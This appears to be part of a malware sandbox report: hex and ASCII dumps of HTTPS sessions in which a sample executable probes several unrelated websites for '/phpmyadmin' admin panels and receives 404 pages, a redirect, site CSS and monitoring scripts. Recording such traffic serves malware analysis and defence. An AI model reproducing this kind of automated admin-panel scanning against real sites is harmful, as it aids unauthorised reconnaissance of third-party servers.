                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 62 6f 74 74 6f 6d 3a 34 70 78 20 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 34 70 78 20 73 6f 6c 69 64 3b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 37 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65
                                                                                                                                                                                                    Data Ascii: bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 64 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 74 68 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 6e 6f 72 6d 61 6c 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b 2d 74 61 62 6c 65 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 68 73 6c 61 28 30 2c 30 25 2c 31 30 30 25 2c 2e 36 35 29 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 76 69 64 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                                                                                                                                                                                                    Data Ascii: lock-table td,.wp-block-table th{word-break:normal}.wp-block-table figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-table figcaption{color:hsla(0,0%,100%,.65)}.wp-block-video figcaption{color:#555;font-size:13px;text-align:c
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 20 23 46 46 46 46 46 46 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 3a 20 23 41 37 31 34 34 43 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 72 3a 20 31 36 37 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 67 3a 20 32 30 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 66 69 6c 74 65 72 73 5f 63 6f 6c 6f 72 73 5f 61 63 63 65 6e 74 5f 62 3a 20 37 36 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63 68 65 73 5f 62 6f 72 64 65 72 5f 72 61 64 69 75 73 3a 20 31 30 30 25 3b 0a 09 2d 2d 79 69 74 68 2d 77 63 61 6e 2d 63 6f 6c 6f 72 5f 73 77 61 74 63
                                                                                                                                                                                                    Data Ascii: #FFFFFF;--yith-wcan-filters_colors_accent: #A7144C;--yith-wcan-filters_colors_accent_r: 167;--yith-wcan-filters_colors_accent_g: 20;--yith-wcan-filters_colors_accent_b: 76;--yith-wcan-color_swatches_border_radius: 100%;--yith-wcan-color_swatc
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC1369INData Raw: 65 20 61 2e 66 61 63 65 62 6f 6f 6b 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 66 61 63 65 62 6f 6f 6b 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 34 35 41 46 45 32 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 35 41 46 45 32 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 74 77 69 74 74 65 72 3a 68 6f 76 65 72 7b 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: e a.facebook{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.facebook:hover{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.twitter{background: #45AFE2; background-color: #45AFE2;}.yith-wcwl-share a.twitter:hover{back


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    355192.168.2.464270172.67.132.454436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC173OUTGET /PhpMyAdmin HTTP/1.1
                                                                                                                                                                                                    Host: esoft.academy
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC636INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cache, privateCF-Cache-Status: DYNAMICReport-To: {"endpoints":
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC733INData Raw: 37 64 33 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 69 6e 69 74 3d 7b 61 6a 61 78 3a 7b 64 65 6e 79 5f 6c 69 73 74 3a 5b 22 62 61 6d 2e 65 75 30 31 2e 6e 72 2d 64 61 74 61 2e 6e 65 74 22 5d 7d 7d 3b 28 77 69 6e 64 6f 77 2e 4e 52 45 55 4d 7c 7c 28 4e 52 45 55 4d 3d 7b 7d 29 29 2e 6c 6f 61 64 65 72 5f 63 6f 6e 66 69 67 3d 7b 6c 69 63 65 6e 73 65 4b 65 79 3a 22 4e 52 4a 53 2d 38 39 33 62 34 33 36 63 64
                                                                                                                                                                                                    Data Ascii: 7d33<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"><script type="text/javascript">(window.NREUM||(NREUM={})).init={ajax:{deny_list:["bam.eu01.nr-data.net"]}};(window.NREUM||(NREUM={})).loader_config={licenseKey:"NRJS-893b436cd
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 3a 76 6f 69 64 20 30 2c 70 72 6f 64 75 63 74 3a 76 6f 69 64 20 30 2c 65 78 74 72 61 3a 76 6f 69 64 20 30 2c 6a 73 41 74 74 72 69 62 75 74 65 73 3a 7b 7d 2c 75 73 65 72 41 74 74 72 69 62 75 74 65 73 3a 76 6f 69 64 20 30 2c 61 74 74 73 3a 76 6f 69 64 20 30 2c 74 72 61 6e 73 61 63 74 69 6f 6e 4e 61 6d 65 3a 76 6f 69 64 20 30 2c 74 4e 61 6d 65 50 6c 61 69 6e 3a 76 6f 69 64 20 30 7d 2c 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 69 6e 66 6f 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 69 66 28 21 6f 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 49 6e 66 6f 20 66 6f 72 20 22 2e
                                                                                                                                                                                                    Data Ascii: :void 0,product:void 0,extra:void 0,jsAttributes:{},userAttributes:void 0,atts:void 0,transactionName:void 0,tNamePlain:void 0},o={};function s(e){if(!e)throw new Error("All info objects require an agent identifier!");if(!o[e])throw new Error("Info for ".
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 65 76 65 6e 74 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 70 61 67 65 5f 76 69 65 77 5f 74 69 6d 69 6e 67 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 33 30 2c 6c 6f 6e 67 5f 74 61 73 6b 3a 21 31 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 73 65 73 73 69 6f 6e 5f 74 72 61 63 65 3a 7b 65 6e 61 62 6c 65 64 3a 21 30 2c 68 61 72 76 65 73 74 54 69 6d 65 53 65 63 6f 6e 64 73 3a 31 30 2c 61 75 74 6f 53 74 61 72 74 3a 21 30 7d 2c 68 61 72 76 65 73 74 3a 7b 74 6f 6f 4d 61 6e 79 52 65 71 75 65 73 74 73 44 65 6c 61 79 3a 36 30 7d 2c
                                                                                                                                                                                                    Data Ascii: !0,harvestTimeSeconds:30,autoStart:!0},page_view_event:{enabled:!0,autoStart:!0},page_view_timing:{enabled:!0,harvestTimeSeconds:30,long_task:!1,autoStart:!0},session_trace:{enabled:!0,harvestTimeSeconds:10,autoStart:!0},harvest:{tooManyRequestsDelay:60},
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 69 66 28 21 67 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 67 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 67 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 66 28 29 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 69 6e 69 74 3d 67 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 70 29 3b 76 61 72 20 6e 3d 68 28 65 29 3b 69 66 28 6e 29 7b 66 6f 72 28 76 61 72 20 72 3d 74 2e 73
                                                                                                                                                                                                    Data Ascii: if(!g[e])throw new Error("Configuration for ".concat(e," was never set"));return g[e]}function v(e,t){if(!e)throw new Error(p);g[e]=(0,i.D)(t,f());const n=(0,r.ek)(e);n&&(n.init=g[e])}function m(e,t){if(!e)throw new Error(p);var n=h(e);if(n){for(var r=t.s
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 5b 65 5d 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 52 75 6e 74 69 6d 65 20 66 6f 72 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 77 61 73 20 6e 65 76 65 72 20 73 65 74 22 29 29 3b 72 65 74 75 72 6e 20 45 5b 65 5d 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 29 7b 69 66 28 21 65 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 41 6c 6c 20 72 75 6e 74 69 6d 65 20 6f 62 6a 65 63 74 73 20 72 65 71 75 69 72 65 20 61 6e 20 61 67 65 6e 74 20 69 64 65 6e 74 69 66 69 65 72 21 22 29 3b 45 5b 65 5d 3d 28 30 2c 69 2e 44 29 28 74 2c 6b 29 3b 63 6f 6e 73 74 20 6e 3d 28 30 2c 72 2e 65 6b 29 28 65 29 3b 6e 26 26 28 6e 2e 72 75 6e 74 69 6d 65 3d 45 5b 65 5d 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29
                                                                                                                                                                                                    Data Ascii: [e])throw new Error("Runtime for ".concat(e," was never set"));return E[e]}function T(e,t){if(!e)throw new Error("All runtime objects require an agent identifier!");E[e]=(0,i.D)(t,k);const n=(0,r.ek)(e);n&&(n.runtime=E[e])}function R(e){return function(e)
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 2e 6e 61 76 69 67 61 74 6f 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 4e 61 76 69 67 61 74 6f 72 7c 7c 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 6e 61 76 69 67 61 74 6f 72 20 69
                                                                                                                                                                                                    Data Ascii: ndow.document,i="undefined"!=typeof WorkerGlobalScope&&("undefined"!=typeof self&&self instanceof WorkerGlobalScope&&self.navigator instanceof WorkerNavigator||"undefined"!=typeof globalThis&&globalThis instanceof WorkerGlobalScope&&globalThis.navigator i
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 29 7d 7d 7d 7d 2c 38 65 33 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 4c 3a 28 29 3d 3e 64 2c 52 3a 28 29 3d 3e 63 7d 29 3b 76 61 72 20 72 3d 6e 28 38 33 32 35 29 2c 69 3d 6e 28 31 32 38 34 29 2c 61 3d 6e 28 34 33 32 32 29 2c 6f 3d 6e 28 33 33 32 35 29 3b 63 6f 6e 73 74 20 73 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 63 6f 6e 73 74 20 6e 3d 7b 73 74 61 67 65 64 3a 21 31 2c 70 72 69 6f 72 69 74 79 3a 6f 2e 70 5b 74 5d 7c 7c 30 7d 3b 75 28 65 29 2c 73 5b 65 5d 2e 67 65 74 28 74 29 7c 7c 73 5b 65 5d 2e 73 65 74 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 29 7b 65 26 26 28 73 5b 65 5d 7c 7c 28 73 5b 65 5d 3d 6e 65 77 20 4d 61 70 29 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 29 7b 6c 65
                                                                                                                                                                                                    Data Ascii: )}}}},8e3:(e,t,n)=>{"use strict";n.d(t,{L:()=>d,R:()=>c});var r=n(8325),i=n(1284),a=n(4322),o=n(3325);const s={};function c(e,t){const n={staged:!1,priority:o.p[t]||0};u(e),s[e].get(t)||s[e].set(t,n)}function u(e){e&&(s[e]||(s[e]=new Map))}function d(){le
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 3b 69 3c 6e 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 6e 5b 69 5d 3d 3d 3d 74 26 26 6e 2e 73 70 6c 69 63 65 28 69 2c 31 29 7d 2c 65 6d 69 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 2c 69 2c 61 29 7b 21 31 21 3d 3d 61 26 26 28 61 3d 21 30 29 3b 69 66 28 75 2e 61 62 6f 72 74 65 64 26 26 21 69 29 72 65 74 75 72 6e 3b 74 26 26 61 26 26 74 2e 65 6d 69 74 28 65 2c 6e 2c 72 29 3b 66 6f 72 28 76 61 72 20 6f 3d 70 28 72 29 2c 63 3d 76 28 65 29 2c 64 3d 63 2e 6c 65 6e 67 74 68 2c 6c 3d 30 3b 6c 3c 64 3b 6c 2b 2b 29 63 5b 6c 5d 2e 61 70 70 6c 79 28 6f 2c 6e 29 3b 76 61 72 20 66 3d 62 28 29 5b 73 5b 65 5d 5d 3b 66 26 26 66 2e 70 75 73 68 28 5b 67 2c 65 2c 6e 2c 6f 5d 29 3b 72 65 74 75 72 6e 20 6f 7d 2c 67 65 74 3a 6d 2c 6c 69 73 74 65 6e 65 72 73 3a 76 2c 63 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ;i<n.length;i++)n[i]===t&&n.splice(i,1)},emit:function(e,n,r,i,a){!1!==a&&(a=!0);if(u.aborted&&!i)return;t&&a&&t.emit(e,n,r);for(var o=p(r),c=v(e),d=c.length,l=0;l<d;l++)c[l].apply(o,n);var f=b()[s[e]];f&&f.push([g,e,n,o]);return o},get:m,listeners:v,cont
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC1369INData Raw: 69 3d 21 30 2c 21 31 7d 2c 67 65 74 20 73 69 67 6e 61 6c 28 29 7b 72 65 74 75 72 6e 20 61 3d 21 30 2c 21 31 7d 7d 3b 72 2e 5f 41 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 2c 72 2e 5f 41 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 6e 75 6c 6c 2c 65 29 7d 63 61 74 63 68 28 65 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 69 7c 7c 61 3f 7b 63 61 70 74 75 72 65 3a 21 21 65 2c 70 61 73 73 69 76 65 3a 69 2c 73 69 67 6e 61 6c 3a 74 7d 3a 21 21 65 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 26
                                                                                                                                                                                                    Data Ascii: i=!0,!1},get signal(){return a=!0,!1}};r._A.addEventListener("test",null,e),r._A.removeEventListener("test",null,e)}catch(e){}function o(e,t){return i||a?{capture:!!e,passive:i,signal:t}:!!e}function s(e,t){let n=arguments.length>2&&void 0!==arguments[2]&


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    356192.168.2.46438818.228.96.1424436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.rechagricola.com.br
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC440INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 32 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 72 65 63 68 2e 63 6f 6d 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6f 72 69 67 69 6e 44 69 72 65 63 74 3d 74 72 75 65 3b 20 4d 61 78 2d 41 67 65 3d 36 30 34 38 30 30 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 30 33 20 44 65 63 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 302 FoundDate: Sun, 26 Nov 2023 05:59:42 GMTContent-Length: 0Connection: closeContent-Security-Policy: frame-ancestors 'self'Location: https://rech.comSet-Cookie: originDirect=true; Max-Age=604800; Expires=Sun, 03 Dec 2023 05:59:42 GM


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    357192.168.2.464334213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:42 UTC180OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 32 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:42 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:43 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
